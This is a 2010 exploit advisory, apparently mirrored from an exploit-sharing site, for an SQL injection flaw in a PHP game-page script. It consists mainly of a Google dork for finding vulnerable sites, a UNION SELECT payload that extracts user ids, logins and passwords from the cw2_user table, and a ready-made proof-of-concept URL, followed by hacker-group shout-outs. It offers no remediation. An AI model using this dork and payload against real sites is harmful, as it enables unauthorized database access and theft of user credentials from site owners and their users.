PHP Gamepage SQL Injection Vulnerability
Posted on 17 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP Gamepage SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================== PHP Gamepage SQL Injection Vulnerability ======================================== ************************************************************************* , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | `---' `---| `---' `---' ` `---' ` `---' `---`--- ` `---' ************************************************************************* [V] PHP Gamepage SQL Injection Vulnerability --==[ Author ]==-- [+] Author : v4lc0m87 [+] Contact : valcom87[at]gmail[dot]com [+] Group : INDONESIAN CYBER [+] Site : http://indonesian-cyber.org/ [+] Date : May, 17-2010 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Vulnerable : SQL Injection [+] Google Dork : inurl:index.php?title=gamepage +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit: [+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- [-] Remote SQLi p0c: [+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG [V] thx to: SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik) Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601) Bocah tua nakal (mbah l4mpor,awchoy) flyff666 cruz3N petimati spykit v3n0m uzanc kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk) blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk) [K]urabu[S]aru [RnR] cO2 community and y0u !! # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
